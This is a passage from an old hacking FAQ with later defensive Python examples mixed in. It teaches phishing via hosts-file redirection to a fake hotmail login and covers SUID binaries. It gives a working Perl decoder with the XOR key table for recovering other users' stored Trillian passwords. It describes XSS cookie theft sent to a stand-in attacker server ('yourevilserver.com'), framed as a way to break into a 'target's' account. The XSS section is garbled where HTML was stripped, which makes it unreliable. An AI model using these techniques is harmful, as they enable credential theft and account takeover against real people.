When they go to their web browser and type "www.hotmail.com" - they will be taken to my server instead of hotmail! And hence, to the fake login. This is considered quite a lame thing to do - but frankly, it requires more skill and understanding than brute forcing. The problem you may have noticed is - you need to somehow get that entry into your target's hosts file...not an easy task :( - if you have physical access to their PC, then you can slip it in there when they aren't about...but otherwise, you would need to trick/exploit them to get that in there (you would probably need to work out how to remove it at a later date too, to avoid getting detected after it has served its purpose). Another side note I should mention is - I believe a Windows machine needs a reboot before the hosts file's changes come into effect. The good thing about this technique is that *nix systems also use hosts files in the same way (except it's located at /etc/hosts). It has a slightly different format to a Windows hosts file, but it's very similar. An example file would be:

212.38.191.83		hotmail.com
212.38.191.83		www.hotmail.com

Please note, that is the IP, followed by 2 tabs (not spaces!) then the alias. There is actually more stuff you can put in the hosts file, like hostname and other aliases...but I won't go into that here, since we have all we need.

Technique 9 - Brute Forcing

Don't even bother with this one, just thought I would mention it. Brute forcing involves trying lots and lots of possible passwords on the web-based email login to try and get the correct password. Today, most half-decent sites will have some sort of IDS (intrusion detection system) to detect the brute force...and perhaps even auto-notify your ISP, or just simply ban you from the site.
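As a defensive counterpart to the hosts trick above, here is an added example (not from the FAQ) that parses a hosts file in the format shown, for both the Windows file and /etc/hosts, and reports any watched hostname that has been pinned to an address other than loopback or 0.0.0.0. The sample file content and the watched-hostname list are constructed for the example.

```python
"""Check a hosts file for entries of the kind the hosts trick relies on.

Added example, not from the Hack FAQ.  It parses the hosts format the FAQ
shows (IP, whitespace, hostname, optional aliases, '#' comments), which is
the same for the Windows file and /etc/hosts, and reports any watched
hostname that is pinned to an address other than loopback or 0.0.0.0.
"""
import ipaddress

# Constructed sample content, modelled on the FAQ's example entries.
SAMPLE_HOSTS = """\
# hosts file: lines starting with '#' are comments
127.0.0.1\tlocalhost
::1\t\tlocalhost
212.38.191.83\twww.mod-x.co.uk
212.38.191.83\thotmail.com
212.38.191.83\twww.hotmail.com   # pinned login host
0.0.0.0\tads.example.test
"""

# Constructed list of hostnames whose login pages matter to this user.
WATCHED = {"hotmail.com", "www.hotmail.com", "mail.yahoo.com", "www.yahoo.com"}


def parse_hosts(text):
    """Return (line_number, ip_address, [hostnames]) for every usable entry.

    Comments are stripped, blank and malformed lines are skipped, and the
    address column must parse as IPv4 or IPv6.  Tabs and spaces both count
    as separators, so the Windows and *nix variants parse the same way.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # an address with no hostname does nothing
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first column is not an address; ignore the line
        entries.append((lineno, ip, [name.lower() for name in fields[1:]]))
    return entries


def suspicious_entries(text, watched):
    """Return (line_number, hostname, ip) for watched names pinned to a
    non-local address.  Loopback and unspecified (0.0.0.0 / ::) targets are
    the normal way people block a name, so they are not reported."""
    watched = {name.lower() for name in watched}
    findings = []
    for lineno, ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        for name in names:
            if name in watched:
                findings.append((lineno, name, str(ip)))
    return findings


def check_hosts_file(path, watched):
    """Read a real hosts file from disk and run the same check on it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read(), watched)


if __name__ == "__main__":
    for lineno, name, ip in suspicious_entries(SAMPLE_HOSTS, WATCHED):
        print(f"line {lineno}: {name} is pinned to {ip}, not resolved via DNS")
```

Run against the sample, it reports lines 5 and 6; point check_hosts_file at the path for your platform to check a real file.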
Apart from brute forcing being skill-less, and probably taking ages, there is a high risk of being caught since lots of attempts/hits to a site really show up in server logs. A number of the programs out there that claim to be stealthy brute force applications really don't work that well either. There really isn't a great deal more you can say on hacking web-based email - without going into detail specifically on one web-based email site, and its authentication methods etc - or describing one exploit in detail. Hopefully, this has given you a general overview of how web-based email is hacked, and how to defend your own accounts (and made it clear that there isn't exactly a 100% guaranteed method of gaining access). Comments welcome ;)

--------------------------------------------------------------------------------

Unix Ownership/Permissions explained

Ok, we really need to cover this in order to do a few other topics in the future, so best to get this out of the way - sorry for all those that already know all of what I am about to say! If you don't know, or have never used *nix style operating systems, and are purely a Windows, Mac, BeOS (or whatever!) user - then I would urge you to take the time to get a shell account on a *nix system somewhere (telnet to sdf.lonestar.org on port 23, they provide basic free shell accounts) and to play with the information I am giving you, rather than just disregarding it. First, we will need to talk about basic unix system privileges. On *nix operating systems, such as Linux, FreeBSD, Solaris (just to name a few), access to files is controlled by the file mode setting of a file. The mode specifies who (user/owner, group, other) can have access to a file and what type of access (read, write, execute) to the file is allowed.
The "User" is the owner of the file (and I will refer to the User as Owner from now on), the "Group" is a particular group of users that the file belongs to, and "Other" corresponds to everyone that is not the User or a member of the Group. For any given ownership relation, we need three bits to specify access permissions: the first to denote read (r) access, the second to denote write (w) access and the third to denote execute (x) access. Therefore, an easy way to denote the access that the Owner has to a file would be "rwx" (which means the Owner has Read, Write, and eXecute access to the particular file). So - how would we denote access if say, the Owner had read access, and execute access - but no write access? Simple, we use a dash to denote that they don't have write access, as so: "r-x". Simple! Now, we have three ownership issues of a file to cover remember - 'owner' permissions, 'group' permissions and 'all' permissions - so we need a "rwx" triplet for each, resulting in nine bits. As an example - let's say that Owner, Group, and All (everyone) have access to Read, Write, and Execute a particular file - we denote this as:

rwxrwxrwx

Just to make this clearer...a breakdown of that would be:

Owner                    Group                    All (Everyone)
Read  Write  Execute     Read  Write  Execute     Read  Write  Execute
 r     w     x            r     w     x            r     w     x

Another example, let's say that the Owner has full access to a file - but Group and All can only read the file. How do we denote this? Like so:

Owner                    Group                    All (Everyone)
Read  Write  Execute     Read  Write  Execute     Read  Write  Execute
 r     w     x            r     -     -            r     -     -

So our end string is "rwxr--r--". Make sense? I hope so! If not, re-read now! Ok - so now, let's say you have your unix shell account open in a telnet window - or you are sitting there at a *nix terminal somewhere - how do you find out the permissions/ownership that a specific file or directory has? We use the "ls" command.
For those that don't know, ls is basically the equivalent to you typing "dir" from a dos prompt...except ls has some nicer options. So, here is an example of me typing ls:

[wang@server mydirectory]# ls
myfile.php index.htm anotherdir

Ok...so that got me a listing of the files in the current directory I was in - but I don't see anything to tell me the permissions on each file/directory in there. To get this information, we have to use ls with an extra parameter "ls -l" - which tells it to show us a long listing, like so:

[wang@server mydirectory]# ls -l
total 6
-rw-r--r--  1 wang  wheel  872 Apr 25 16:26 myfile.php
-rw-r--r--  1 wang  wheel  680 Apr 25 16:26 index.htm
drwxr-xr-x  2 wang  wheel  512 Apr  3 13:40 anotherdir

Ah! That's more like it. Ok, immediately you will notice that it shows one file/directory per line - along with the permissions of that file/directory, its owner's username, the group name, the size, the date/time, and the file/dir name. You will also notice something different about the permissions - two of them have a "-" in front of the normal permissions system I explained, and one has a "d" in front. This is easy - this is the way we tell what is a directory and what isn't - if it has a "d" in front of the permission listing, it's a directory - if it has a "-", it's a file of some kind. If you look at the first line, the listing for the file "myfile.php" - we can see it has permissions "rw-r--r--" - which as we have already determined means that the owner (who is listed as "wang" in that output) has read and write access, but group and all only have read access. "wheel" is the name of the group which that file/directory belongs to. We also need to mention that permissions on a directory don't mean exactly the same thing as the permissions on files I explained. When dealing with permissions in relation to a directory, Read means you can view the directory's contents (i.e.
do an ls in it), Write means you can create/edit/delete files within the directory, and Execute determines whether a user can "cd" into a directory (i.e. move into it, just like cd in dos). Now you know how permissions are represented for files/directories - and what they mean...but how do we set/alter them? And are there other ways of representing them? Well, yes. Permissions/access is actually based on an integer number from zero to seven, the "rwxr--r--" representation is really just to make things easier. There is an integer for each set of people accessing the file (user, group, other). The type of access allowed for each number is determined by adding 1 for execute access, 2 for write access, and 4 for read access. Zero indicates no privileges. Therefore, the allowed values are:

Number  Permission
0       No Access
1       Execute Only
2       Write Only
3       Execute and Write
4       Read Only
5       Execute and Read
6       Read and Write
7       Read, Write, and Execute

If you are feeling lost and confused, bear with me...the purpose of these numbers will become clearer. You are probably thinking - why tell me these numbers? - well it's just useful to know, and I prefer changing file/directory permissions using numbers ;) - sorry! So, what is the command to actually change permissions? - the answer is "chmod". First, let's talk about using chmod with the numbers in the table above that I gave. The format to use chmod would be:

chmod mode file(s)

So, a good example would be "chmod 755 blah.pl". Why three digits? Well, we are back at the Owner, Group, All permission thing again. Every one of the three digits in the mode number corresponds to one of the three permission triplets. Every permission bit in a triplet corresponds to a value - which, despite my complex looking table, can be easily remembered as: 0 for nothing (dash), 4 for r, 2 for w, 1 for x. Let's work an example out, let's say we have the permission "rwxr-xr-x" on some file...what chmod string was used to give that file those permissions?
Simple:

    Triplet for user:  rwx => 4 + 2 + 1 = 7
    Triplet for group: r-x => 4 + 0 + 1 = 5
    Triplet for all:   r-x => 4 + 0 + 1 = 5

    Which makes: 755

It's not as hard as it looks, and it's not as hard to remember as you might think...it actually becomes second nature. There is, however, an easier way if this really does scare you. chmod can also be used in the format "chmod [options] mode file(s)". The 'mode' part specifies the new permissions for the file(s) that follow as arguments. A mode specifies which users' permissions should be changed, and after that which access types should be changed. Let's say, for example:

    chmod a-x socktest.pl

This means that the execute bit should be cleared (-) for all users (owner, group and all). The permissions start with a letter specifying which users should be affected by the change; this might be any of the following:

    u   the owner user
    g   the owner group
    o   everyone else, all (what we described as other users)
    a   all users, i.e. user/group/all together

This is followed by a change instruction which consists of a + (set bit) or - (clear bit) and the letter corresponding to the bit that should be changed. So, hopefully now you can see where "chmod a-x socktest.pl" came from. We could also have said "chmod g-x socktest.pl" to only remove the group execute permission, or we could have said "chmod o+r socktest.pl" to give all/everyone else read access to this file. If you really want to read up more on chmod, please type "man chmod" from a shell prompt to see the manual on it.
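To make the two chmod forms above concrete, here is an added Python example (not from the original FAQ) that converts an ls -l permission string into the three-digit mode and applies symbolic changes like "g-w" or "o+r"; the function names are my own, and only the r/w/x bits are handled (no setuid/sticky bits).

```python
"""Permission-string helpers: numeric and symbolic chmod, as explained above.

Added example, not code from the original FAQ.  Only r, w and x are handled;
setuid/setgid/sticky bits are out of scope here.
"""

BIT_VALUE = {"r": 4, "w": 2, "x": 1}
WHO_INDEX = {"u": 0, "g": 1, "o": 2}   # triplet positions: user, group, other


def triplet_to_digit(triplet):
    """'r-x' -> 5: add 4 for r, 2 for w, 1 for x, nothing for a dash."""
    if len(triplet) != 3:
        raise ValueError("a triplet is exactly three characters: %r" % triplet)
    total = 0
    for expected, ch in zip("rwx", triplet):
        if ch == expected:
            total += BIT_VALUE[ch]
        elif ch != "-":
            raise ValueError("unexpected character %r in %r" % (ch, triplet))
    return total


def perms_to_mode(perms):
    """'rwxr-xr-x' -> '755'.  A leading type column ('d' or '-') is ignored."""
    if len(perms) == 10:          # ls -l output includes the type column
        perms = perms[1:]
    if len(perms) != 9:
        raise ValueError("expected nine permission characters: %r" % perms)
    return "".join(str(triplet_to_digit(perms[i:i + 3])) for i in (0, 3, 6))


def mode_to_perms(mode):
    """'664' -> 'rw-rw-r--': the reverse mapping, one digit per triplet."""
    if len(mode) != 3 or not all(d in "01234567" for d in mode):
        raise ValueError("mode must be three octal digits: %r" % mode)
    out = []
    for d in mode:
        n = int(d)
        out.append(("r" if n & 4 else "-") +
                   ("w" if n & 2 else "-") +
                   ("x" if n & 1 else "-"))
    return "".join(out)


def apply_symbolic(perms, change):
    """Apply one symbolic change such as 'g-w', 'o+r' or 'a-x' to perms."""
    if len(perms) == 10:
        perms = perms[1:]
    if len(change) < 3 or change[-2] not in "+-":
        raise ValueError("change must look like u+x / g-w / a-x: %r" % change)
    who, op, bit = change[:-2], change[-2], change[-1]
    if bit not in BIT_VALUE:
        raise ValueError("only r, w and x are handled here: %r" % bit)
    targets = ("u", "g", "o") if who == "a" else tuple(who)
    if not targets or any(w not in WHO_INDEX for w in targets):
        raise ValueError("who must be one of u, g, o, a: %r" % who)
    chars = list(perms)
    for w in targets:
        pos = WHO_INDEX[w] * 3 + "rwx".index(bit)
        chars[pos] = bit if op == "+" else "-"
    return "".join(chars)


if __name__ == "__main__":
    # Walks through the sequence the FAQ uses later: 644 -> 664 -> o+w -> g-w -> 600
    p = "rw-r--r--"
    print(p, perms_to_mode(p))                 # rw-r--r-- 644
    p = mode_to_perms("664"); print(p)         # rw-rw-r--
    p = apply_symbolic(p, "o+w"); print(p)     # rw-rw-rw-
    p = apply_symbolic(p, "g-w"); print(p)     # rw-r--rw-
    print(mode_to_perms("600"))                # rw-------
```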
As a final example, I will show an example of me using chmod on a file "test.txt". We start with the file test.txt, which the owner "wang" has read/write access to, and group/all only have read access to:

    [wang@server ~/test]# ls -l
    total 2
    -rw-r--r--  1 wang  wang  5 Aug  7 19:43 test.txt

I then decided to give my group write access to test.txt, so I used chmod like so:

    [wang@server ~/test]# chmod 664 test.txt
    [wang@server ~/test]# ls -l
    total 2
    -rw-rw-r--  1 wang  wang  5 Aug  7 19:43 test.txt

Then, I gave all/everyone write access too (feeling generous!):

    [wang@server ~/test]# chmod o+w test.txt
    [wang@server ~/test]# ls -l
    total 2
    -rw-rw-rw-  1 wang  wang  5 Aug  7 19:43 test.txt

Then, I take write access away from the group:

    [wang@server ~/test]# chmod g-w test.txt
    [wang@server ~/test]# ls -l
    total 2
    -rw-r--rw-  1 wang  wang  5 Aug  7 19:43 test.txt

And then I decide to remove all access from group/all, to leave only the owner with access to the file:

    [wang@server ~/test]# chmod 600 test.txt
    [wang@server ~/test]# ls -l
    total 2
    -rw-------  1 wang  wang  5 Aug  7 19:43 test.txt

--------------------------------------------------------------------------------

What are SUID Binaries and why are they dangerous?

This was a requested topic via the Hack Faq form, but is also quite a frequently asked question on the boards I see, hence I thought we should cover it. If you haven't read the previous topic on Unix ownership/permissions - I suggest you do so now.

Let's first establish what SUID is - SUID is short for Set User ID. As we explained in the previous topic, commands/files you execute always run with your privileges on the system - makes sense for security purposes, right? Wrong - this is where SUID comes in. SUID files can be run with the privileges of their owner (usually the person who SUID'd them). When you run a program with the suid bit set, the program is run as the owner of the program rather than as you, the person running it.
This means that when it is running, the program has access to all of its owner's files and privileges. Does this sound dangerous to you? It should do...because it is - but it's sometimes necessary.

Let's take an example now, say the unix "passwd" command (which you can use to change your password for logging into the system). This is a typical use of the passwd program:

    $ passwd
    Changing password for wang
    (current) UNIX password:
    New UNIX password:
    Password changed

Have you ever sat back and thought "what does it actually have to do to change my password?" Well, the passwd program has to be able to update the /etc/passwd and /etc/shadow files (or equivalent, depending on what *nix you are using), which are owned by root - so therefore a typical binary not owned by root wouldn't be able to do it...and passwd must run as root to do this. So the dilemma is set - the program must be owned by root and modify files that only root should be able to modify - but allow you to run it as a standard user. So, how does passwd achieve this? It is SUID - as the ls -l shows:

    -rwsr-xr-x  1 root  root  27K Jul  8 17:01 passwd

Notice the "s" in the privileges - that's how you identify a SUID binary. Therefore, passwd works because its owner is root and it has the suid bit set - so we run passwd as our user, but the system automatically makes it run as root.

This is all well and good, and you can no doubt see why SUID binaries are useful...however, there should also be alarm bells ringing in your heads. What if...the program was exploitable somehow - what if you could make the program execute any command you wish? If you could...it would execute any command you wish, not at your privilege level - but at the SUID level. Therefore, SUID-root programs are the largest security threat...since you can't get any better than being able to execute any command you wish as root!
SUID programs are also very dangerous because interaction with the untrusted user begins before the program is even started. There are many ways to confuse the program, using things like environment variables, signals, or anything you want. Exactly this 'confusion' of a program is a cause of frequent buffer overflows (which we will cover). More than 50% of all major security bugs leading to releases of security advisories are attributed to SUID programs. And some distributions of *nix are shipped with hundreds of these suid programs, most of which you'll probably never use. Of course there are a few which are necessary, in order that a normal user might perform operations which are normally done by root (like the passwd example). So, we have another dilemma - we don't want to have risky SUID programs on our system....but we can't delete them all. Doh.

First things first...is there a quick way to find all the SUID binaries on my system? Yes - execute the following command from a shell:

    for i in `find / -perm +6000 -type f`; do ls -aFl $i >> suids; done

This is a really good way of finding them, since it will go through searching and create a file in your current directory called "suids" which has the ls -l output of each SUID binary for you to see. If the above command doesn't work, it may be because the above command relies on GNU find (and newer GNU find versions have replaced "-perm +6000" with "-perm /6000"), and you might be on a *nix variation with a less-friendly find...therefore try:

    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;

If you ran the first command above, you can then just "cat suids" or read it in your favourite editor (pico suids, vi suids, vim suids, etc) to see the list of SUID binaries found. If you ran the second find string...you should see the list appear in the shell as it searches.
You will see all the usual suspects there - all the SUID ones you need, such as passwd, su, mount etc - but unfortunately, since every distribution and unix system will be different, I can't tell you which ones you need and which ones you don't :( - it will be a process of discovery for you. Here is just a small list of the really common "ok" expected SUID binaries (there may be a lot more on yours though, don't panic):

    /usr/bin/crontab
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/local/bin/ssh
    /usr/local/bin/screen-3.7.2
    /usr/X11R6/bin/xload
    /usr/X11R6/bin/xterm
    /usr/X11R6/bin/XF86_Mach32
    /var/qmail/bin/qmail-queue
    /bin/su

The best way of doing it is to log all the SUID binaries you have when you first put your system live...and then monitor the system to see if any odd SUID binaries are added at a later date. Bear in mind that a strange SUID binary appearing could be the sign of a hacker backdooring an account. Just in case you do need to remove the SUID bit on something - it can be achieved by executing the chmod command like so:

    chmod -s filename

We briefly mentioned earlier that buffer overflows are tied to SUID binaries being dangerous. This is because our worst fear, being able to make a SUID-root binary (or similar) execute any command of your choice, can come true if a buffer overflow exploit exists in the SUID program. I planned to include a topic on Buffer Overflows as the next topic in this faq volume, but I realised that there are so many excellent texts on it already that I would only be rehashing what other people have said. I am therefore providing links to two excellent texts that deal with the subject, which I hope you will read. If there is a large demand for me to cover the topic..I will try and include it next time, but I really think the texts linked to below will help you understand the subject well enough.
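The "log them when the system goes live, then watch for new ones" advice above, written out as an added Python script (not from the original FAQ): it records every setuid/setgid file with its owner, mode and size, and on later runs reports anything added, removed or changed. The script name, the baseline file format and the skipping of /proc, /sys and /dev are my own choices.

```python
"""SUID/SGID baseline and drift check (added example, not the FAQ's own code).

First run writes a baseline of all set-uid/set-gid regular files; later runs
compare against it.  lstat is used so symlinks are not followed, and owner,
mode and size are recorded so a replaced binary shows up even at the same
path.  Intended to run as root from cron, e.g.
    python3 suidcheck.py / /var/lib/suid-baseline.json   (hypothetical names)
"""
import json
import os
import stat
import sys

SUID_SGID = stat.S_ISUID | stat.S_ISGID
SKIP_DIRS = ("/proc", "/sys", "/dev")   # pseudo-filesystems, nothing to record


def find_suid(root):
    """Return {path: {"uid", "mode", "size"}} for every regular file under
    root that has the setuid or setgid bit set."""
    found = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue          # vanished or unreadable; nothing to record
            if stat.S_ISREG(st.st_mode) and st.st_mode & SUID_SGID:
                found[path] = {"uid": st.st_uid,
                               "mode": oct(stat.S_IMODE(st.st_mode)),
                               "size": st.st_size}
    return found


def diff_baseline(baseline, current):
    """Compare two find_suid() results.  Returns sorted lists of paths that
    were 'added' (new SUID files), 'removed' (gone or no longer SUID) and
    'changed' (same path, different owner, mode or size)."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    changed = sorted(p for p in baseline
                     if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def main(argv):
    root, baseline_file = argv[1], argv[2]
    current = find_suid(root)
    if not os.path.exists(baseline_file):
        with open(baseline_file, "w") as fh:
            json.dump(current, fh, indent=1, sort_keys=True)
        print("baseline written: %d SUID/SGID files" % len(current))
        return 0
    with open(baseline_file) as fh:
        baseline = json.load(fh)
    report = diff_baseline(baseline, current)
    for kind in ("added", "removed", "changed"):
        for path in report[kind]:
            print("%-8s %s" % (kind.upper(), path))
    # A non-zero exit lets cron mail or a monitoring wrapper raise the alarm.
    return 1 if any(report.values()) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```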
For further reading, check:

    Exploitation of stack based buffer overflows
    Stack Based buffer overflows, part II

--------------------------------------------------------------------------------

Decrypting Trillian Passwords

As you may remember, in past hack faqs we went through the ICQ password storage technique, and how to decrypt ICQ .dat files in order to get the cleartext passwords from them. Trillian is fast becoming one of the most popular instant messaging programs around. It is described as: "Communicate with Flexibility and Style. Trillian is everything you need for instant messaging. Connect to ICQ®, AOL Instant Messenger(SM), MSN Messenger, Yahoo! Messenger and IRC in a single, sleek and slim interface." That's right, trillian is an all-in-one program which allows you to be on ICQ, AIM (the AOL instant messenger), MSN, Yahoo, and even IRC, all at once from one program.

In itself, trillian is a good program, with some nice features - but it suffers from an awful password storage system. Although not compulsory, trillian saves your password to connect to all the networks (ICQ, AOL, MSN etc) - and most people, out of convenience, will want their passwords stored. The problem is that trillian stores them with only a very weak encryption. The trillian passwords are stored separately in .ini files (which relate to each network, i.e. there is a msn.ini, an aim.ini etc). These are stored in your trillian directory (usually c:\program files\trillian) in the "users" folder. Within the users folder, the ini files will either be in a folder called "default" or a folder named after your username.
For example, on my installation for testing purposes, the msn.ini was stored at:

    c:\program files\trillian\users\default\msn.ini

On opening this file...you find details like:

    [msn]
    auto reconnect=1
    save passwords=1
    idle time=15
    show buddy status=1
    port=1863
    server=messenger.hotmail.com
    last msn=someone@hotmail.com
    connect num=10
    connect sec=60
    save status=1
    ft port=6891
    [profile 0]
    name=someone@hotmail.com
    password=A347F2B74EE9A9F6

and so on... The line "password=A347F2B74EE9A9F6" is obviously the encrypted password that we want to decrypt. Now, the encryption used here is a simple xor encryption of the original password, which is then represented as hex. If we split the password into the actual hex representation, it might make more sense:

    A3 47 F2 B7 4E E9 A9 F6

Ok, when beating an xor encryption...you need to know what each letter of the original password was xor'd with. Thankfully, there is an easy way to find this out - so long as you know the original pass. And, as you may guess - knowing the xor key that trillian uses to encrypt passwords is also the key to being able to decrypt passwords that we don't know!

First, we need to know what the hex value "A3" (the first value of the encrypted password) represents in standard numbers. If you know your hex, you will know that the value of "A3" is 163. I know for a fact that the first letter of my password is "P", therefore - to find out what trillian xor'd with my original "P" in order to get 163 - we do the following calculation:

    Numeric value of A3 = 163
    Numeric (ascii) value of P = 80
    Calculation: 80 XOR 163 = 243

There we go - 243 is the number that the first value of your password is xor'd with. We can test this by doing the process in reverse using this knowledge:

    First letter of password = P
    Ascii value of P = 80
    XOR key for 1st char = 243
    Calculation = 80 xor 243 = 163
    163 in Hex = A3
    Encrypted password so far: A3

Go on to the 2nd character...and so on...
Hopefully, you can now see how trivial it is to get the rest of the xor key numbers, and how to decrypt the passwords once you have the xor key. Let me save you some time...the xor key numbers for each char are (in order):

    243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124,
    000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000,
    255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000,
    128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116,
    111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112,
    114, 111, 120, 000

As most passwords are usually 5-10 letters/numbers long, you will rarely need to use even a quarter of those xor keys. And just to help clarify...here is a perl script I have written which will decrypt an encrypted trillian password:

    #!/usr/bin/perl
    #################
    # Trillian Password Decoder - Wang (wang@most-wanted.com)
    # written for hack faq Volume 9 (faqs.wangproducts.net)
    #################

    # Uncomment if you are running as a cgi
    #print "Content-type: text/html\n\n";

    $encrypted = "A347F2B74EE9A9F6";   # put your encrypted password here!

    $xorkeys = "243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000";

    $pointer = 0;
    @keys = split(/, /, $xorkeys);

    print "Decrypted Password: ";
    foreach $key (@keys) {
        # take the next two hex digits, convert to a number, xor with this position's key
        $passchar = chr(hex(substr($encrypted, $pointer, 2)) ^ $key);
        print "$passchar";
        last if ($pointer == length($encrypted) - 2);
        $pointer += 2;
    }
    exit;

--------------------------------------------------------------------------------

What is Cross Site Scripting (css/xss)?
Ok, firstly - cross site scripting is commonly referred to as xss or css - but please do not get it mixed up with cascading style sheets (used in web pages, and also referred to by the abbreviation css). I am covering this topic because, although a lot of people have heard of it, usually from the term being mentioned in security/vulnerability advisories, there is definitely a lack of understanding when it comes to what it actually is, and why it occurs. This was a requested topic via the Hack Faq form and I decided that it would be worth covering due to it being a major cause of security vulnerabilities at the moment. Cross site scripting, in a way, took a lot of major sites (Ebay, Google, all sites running phpnuke) and software developers by surprise when it emerged as a common flaw...and there are millions of cross site scripting flaws still out there, and many new ones being created every day!

To understand what cross site scripting (xss) is, we need to look at what makes it possible. xss affects two things:

    Web browsers (such as Internet Explorer, Netscape, Mozilla, Opera)
    Web servers that dynamically generate pages based on unvalidated input (most web servers)

Most web browsers have the capability to interpret scripts embedded in web pages downloaded from a web server. By this, we mean languages such as javascript (and also Java, VBScript, ActiveX, Flash, etc) which can be embedded in a standard html page, for example:

    Welcome to my page on the web.

The javascript code embedded in the ">Click here

All you see (if you don't look closely at the link before clicking) are the words "Click here". So, say you clicked there....the url takes you to www.someserver.com and includes the rogue javascript code in the url string - which is passed into their postmessage.cgi script.
Now, if the web server sends back any page to the user which includes the value of "msg" which you submitted to the server by clicking the link - the rogue code will be sent back to your browser, which (as we earlier determined) will execute it, since it thinks it's code embedded in the body of the html file. What's just happened? Put simply - the person that sent you the link has just made you execute any code they wanted you to. A hyperlink (as we have seen above) is a common way for this kind of attack to be executed, since it is easy for the attacker to use some form of url encoding to make the link you click on not so obviously malicious.

A similar, yet more devious attack can also be executed via the hyperlink technique, using a link like so:

    Click here

Note the SRC attribute in the

If our "target" visited that link, they would be taken to the vulnerablescript.cgi on the hotmail server - which would then read in the "variable" from the query string...which of course contains our xss javascript code. The javascript would then access the script http://yourevilserver.com/cgi-bin/stealcookie.cgi on your server with your hotmail cookie in the query string. Since your stealcookie.cgi is logging the querystring on every request sent to it - you should then find our target's hotmail cookie sitting in your log. The next step would be to url encode (probably using hex encoding) the URL a bit, so that it's not so blatantly obvious what the link does, although this isn't 100% necessary - it just depends how dumb your target is. The last step is to make the target visit that URL....which can be done in a zillion ways depending on how crafty you are - but more than likely you will just send them the hyperlink through email like we mentioned earlier.

Ok, now let's think of xss from the other point of view - how do you prevent being exploited by it? If you are a coder or the webmaster of a site, the answer is simple - never trust user input!
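Here is an added Python example (not from the original FAQ) of the postmessage.cgi "msg" reflection described above, with the vulnerable rendering beside a hardened one that HTML-encodes the value on output; it also shows why an attribute context needs the quote characters encoded as well. The URL, templates, parameter name and function names are constructed for the example.

```python
"""Reflected XSS: vulnerable vs. hardened page rendering.

Added example, not the FAQ's own code.  Models a script that echoes the "msg"
query parameter into an HTML page.  render_unsafe() copies the value in
verbatim (the flaw); render_safe() encodes it on output so the browser shows
the text instead of interpreting it as markup.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Two places user data commonly lands: an element body and an attribute value.
BODY_TEMPLATE = "<html><body><p>Your message:</p><div>%s</div></body></html>"
ATTR_TEMPLATE = '<input type="text" name="msg" value="%s">'


def msg_from_url(url):
    """Extract the 'msg' parameter from a request URL (decodes %XX escapes)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("msg", [""])[0]


def render_unsafe(msg):
    """Vulnerable behaviour: whatever came in the query string becomes HTML."""
    return BODY_TEMPLATE % msg


def render_safe(msg):
    """Hardened: encode & < > on output.  That is enough for element-body
    context; quote=False here is deliberate, to contrast with the attribute case."""
    return BODY_TEMPLATE % html.escape(msg, quote=False)


def render_attr_safe(msg):
    """Attribute context needs the quotes encoded too (quote=True also turns
    " and ' into entities); otherwise a quote in the value can end the
    attribute early."""
    return ATTR_TEMPLATE % html.escape(msg, quote=True)


def reflects_raw_markup(page, user_value):
    """Check for a test suite: True when the user's value appears in the
    output byte-for-byte while still containing an unencoded '<'."""
    return "<" in user_value and user_value in page


if __name__ == "__main__":
    # Constructed request: the msg parameter carries a script tag.
    url = ("http://www.someserver.com/cgi-bin/postmessage.cgi"
           "?msg=hello%3Cscript%3Ealert(1)%3C%2Fscript%3E")
    msg = msg_from_url(url)
    print("decoded msg:", msg)
    print("unsafe page reflects markup:", reflects_raw_markup(render_unsafe(msg), msg))  # True
    print("safe page reflects markup:  ", reflects_raw_markup(render_safe(msg), msg))    # False
    print(render_safe(msg))
    print(render_attr_safe('say "hi" & bye'))
```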
Always filter metacharacters and ensure that unwanted chars are removed from user input before proceeding to process/output the data. Filtering/replacing the chars < and > can go a long way to prevent xss flaws cropping up - but also chars like ( and ) and # and & should be filtered or replaced. From a user point of view...never trust links from people you don't know - and try to ensure that you only follow links from the main site you want to view. Don't click on a link to hotmail from another site; always go to hotmail yourself, etc. It's tough, but these measures would protect you from most xss flaws. You should also consider turning off javascript in your web browser (which prevents javascript being used as the injected code, which is common) and set your IE security settings to high if you use Internet Explorer.

A friend of mine who proof-read this volume also suggested - "By enforcing the Characterset for the web page (along with other security mechanisms), you can effectively do input validation through the automatic escaping of characters not found in the specified set. This is useful in mitigating damage until proper input validation and testing can take place." - so there are a few things you can do to make yourself safer.

I have also been recommended the following links, which you should check out if you want to read further into this topic:

    Web Application Security (XSS and SQL Injection) - http://www.cgisecurity.com/lib/web_security.pdf
    Cross Site Scripting (XSS) FAQ - http://www.cgisecurity.com/articles/xss-faq.shtml

--------------------------------------------------------------------------------

